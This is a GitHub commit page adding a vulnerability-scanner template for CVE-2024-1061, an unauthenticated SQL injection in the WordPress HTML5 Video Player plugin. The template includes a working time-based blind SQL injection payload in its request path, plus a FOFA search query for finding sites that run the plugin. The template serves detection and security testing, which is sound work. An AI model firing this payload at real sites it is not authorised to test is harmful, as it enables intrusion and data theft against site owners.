Merge pull request #9058 from xxcdd/CVE-2024-1061

Add CVE-2024-1061.yaml
patch-1
Dhiyaneshwaran 2024-01-31 19:42:07 +05:30 committed by GitHub
commit f82073e9bc
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2024-1061
info:
name: WordPress HTML5 Video Player - SQL Injection
author: xxcdd
severity: high
description: |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
reference:
- https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2024-1061
cwe-id: CWE-89
metadata:
verified: true
fofa-query: '"wordpress" && body="html5-video-player"'
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
http:
- method: GET
path:
- "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(header, "application/json")'
- 'contains_all(body, "created_at", "video_id")'
condition: and